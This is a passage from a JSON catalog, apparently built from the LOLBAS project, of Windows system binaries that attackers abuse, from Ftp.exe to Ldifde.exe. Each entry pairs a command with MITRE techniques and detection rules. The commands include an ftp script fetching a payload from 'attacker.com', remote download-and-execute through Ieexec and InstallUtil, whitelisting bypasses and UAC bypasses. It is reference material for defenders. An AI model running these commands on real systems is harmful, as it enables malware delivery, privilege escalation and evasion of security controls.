ftp.exe"}],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"]},{"id":"lolbas:ftp-exe:1","toolId":"lolbas:ftp-exe","toolName":"Ftp.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"cmd.exe /c \"@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v\"","description":"Download","usecase":"Spawn new process using ftp.exe. Ftp.exe downloads the binary.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"type":"IOC","value":"cmd /c as child process of ftp.exe"}],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"]},{"id":"lolbas:gpscript-exe:0","toolId":"lolbas:gpscript-exe","toolName":"Gpscript.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Gpscript /logon","description":"Executes logon scripts configured in Group Policy.","usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"type":"IOC","value":"Scripts added in local group policy"},{"type":"IOC","value":"Execution of Gpscript.exe after logon"}],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"]},{"id":"lolbas:gpscript-exe:1","toolId":"lolbas:gpscript-exe","toolName":"Gpscript.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Gpscript /startup","description":"Executes startup scripts configured in Group Policy","usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"type":"IOC","value":"Scripts added in local group policy"},{"type":"IOC","value":"Execution of Gpscript.exe after logon"}],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"]},{"id":"lolbas:hh-exe:0","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"HH.exe {REMOTEURL:.bat}","description":"Open the target batch script with HTML Help.","usecase":"Download files from url","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"]},{"id":"lolbas:hh-exe:1","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"HH.exe {PATH_ABSOLUTE:.exe}","description":"Executes specified executable with HTML Help.","usecase":"Execute process with HH.exe","mitre":["T1218.001"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"]},{"id":"lolbas:hh-exe:2","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"HH.exe {REMOTEURL:.chm}","description":"Executes a remote .chm file which can contain commands.","usecase":"Execute commands with HH.exe","mitre":["T1218.001"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"]},{"id":"lolbas:imewdbld-exe:0","toolId":"lolbas:imewdbld-exe","toolName":"IMEWDBLD.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe {REMOTEURL}","description":"IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml"}],"references":["https://twitter.com/notwhickey/status/1367493406835040265","https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"]},{"id":"lolbas:ie4uinit-exe:0","toolId":"lolbas:ie4uinit-exe","toolName":"Ie4uinit.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ie4uinit.exe -BaseSettings","description":"Executes commands from a specially prepared ie4uinit.inf file.","usecase":"Get code execution by copy files to another location","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\ie4uinit.exe","c:\\windows\\sysWOW64\\ie4uinit.exe","c:\\windows\\system32\\ieuinit.inf","c:\\windows\\sysWOW64\\ieuinit.inf"],"toolType":"Binary","detection":[{"type":"IOC","value":"ie4uinit.exe copied outside of %windir%"},{"type":"IOC","value":"ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"]},{"id":"lolbas:iediagcmd-exe:0","toolId":"lolbas:iediagcmd-exe","toolName":"iediagcmd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"set windir=c:\\test& cd \"C:\\Program Files\\Internet Explorer\\\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}","description":"Executes binary that is pre-planted at C:\\test\\system32\\netsh.exe.","usecase":"Spawn a pre-planted executable from iediagcmd.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Internet Explorer\\iediagcmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process iediagcmd.exe with /out could be suspicious"}],"references":["https://twitter.com/Hexacorn/status/1507516393859731456","https://lolbas-project.github.io/lolbas/Binaries/iediagcmd/"]},{"id":"lolbas:ieexec-exe:0","toolId":"lolbas:ieexec-exe","toolName":"Ieexec.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ieexec.exe {REMOTEURL:.exe}","description":"Downloads and executes executable from the remote server.","usecase":"Download and run attacker code from remote location","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"IOC","value":"Network connections originating from ieexec.exe may be suspicious"}],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"]},{"id":"lolbas:ieexec-exe:1","toolId":"lolbas:ieexec-exe","toolName":"Ieexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ieexec.exe {REMOTEURL:.exe}","description":"Downloads and executes executable from the remote server.","usecase":"Download and run attacker code from remote location","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"IOC","value":"Network connections originating from ieexec.exe may be suspicious"}],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"]},{"id":"lolbas:ilasm-exe:0","toolId":"lolbas:ilasm-exe","toolName":"Ilasm.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"ilasm.exe {PATH_ABSOLUTE:.txt} /exe","description":"Binary file used by .NET to compile C#/intermediate (IL) code to .exe","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Ilasm may not be used often in production environments (such as on endpoints)"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"]},{"id":"lolbas:ilasm-exe:1","toolId":"lolbas:ilasm-exe","toolName":"Ilasm.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"ilasm.exe {PATH_ABSOLUTE:.txt} /dll","description":"Binary file used by .NET to compile C#/intermediate (IL) code to dll","usecase":"A description of the usecase","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Ilasm may not be used often in production environments (such as on endpoints)"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml"}],"references":["https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt","https://lolbas-project.github.io/lolbas/Binaries/Ilasm/"]},{"id":"lolbas:infdefaultinstall-exe:0","toolId":"lolbas:infdefaultinstall-exe","toolName":"Infdefaultinstall.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"InfDefaultInstall.exe {PATH:.inf}","description":"Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.","usecase":"Code execution","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\Infdefaultinstall.exe","C:\\Windows\\SysWOW64\\Infdefaultinstall.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"}],"references":["https://twitter.com/KyleHanslovan/status/911997635455852544","https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/","https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/"]},{"id":"lolbas:installutil-exe:0","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}","description":"Execute the target .NET DLL or EXE.","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.004"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"]},{"id":"lolbas:installutil-exe:1","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}","description":"Execute the target .NET DLL or EXE.","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.004"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"]},{"id":"lolbas:installutil-exe:2","toolId":"lolbas:installutil-exe","toolName":"Installutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"InstallUtil.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/","https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md","https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool","https://lolbas-project.github.io/lolbas/Binaries/Installutil/"]},{"id":"lolbas:iscsicpl-exe:0","toolId":"lolbas:iscsicpl-exe","toolName":"iscsicpl.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"c:\\windows\\syswow64\\iscsicpl.exe","description":"c:\\windows\\syswow64\\iscsicpl.exe has a DLL injection through `C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll`, resulting in UAC bypass.","usecase":"Execute a custom DLL via a trusted high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"},{"type":"IOC","value":"C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll"},{"type":"IOC","value":"Suspicious child process to iscsicpl.exe like cmd, powershell etc."}],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"]},{"id":"lolbas:iscsicpl-exe:1","toolId":"lolbas:iscsicpl-exe","toolName":"iscsicpl.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"iscsicpl.exe","description":"Both `c:\\windows\\system32\\iscsicpl.exe` and `c:\\windows\\system64\\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["c:\\windows\\system32\\iscsicpl.exe","c:\\windows\\syswow64\\iscsicpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml"},{"type":"IOC","value":"C:\\Users\\<username>\\AppData\\Local\\Microsoft\\WindowsApps\\ISCSIEXE.dll"},{"type":"IOC","value":"Suspicious child process to iscsicpl.exe like cmd, powershell etc."}],"references":["https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","https://lolbas-project.github.io/lolbas/Binaries/iscsicpl/"]},{"id":"lolbas:jsc-exe:0","toolId":"lolbas:jsc-exe","toolName":"Jsc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"jsc.exe {PATH:.js}","description":"Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"type":"IOC","value":"Jsc.exe should normally not run a system unless it is used for development."}],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"]},{"id":"lolbas:jsc-exe:1","toolId":"lolbas:jsc-exe","toolName":"Jsc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"jsc.exe /t:library {PATH:.js}","description":"Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml"},{"type":"IOC","value":"Jsc.exe should normally not run a system unless it is used for development."}],"references":["https://twitter.com/DissectMalware/status/998797808907046913","https://www.phpied.com/make-your-javascript-a-windows-exe/","https://lolbas-project.github.io/lolbas/Binaries/Jsc/"]},{"id":"lolbas:ldifde-exe:0","toolId":"lolbas:ldifde-exe","toolName":"Ldifde.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Ldifde -i -f {PATH:.ldf}","description":"Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.","usecase":"Download file from 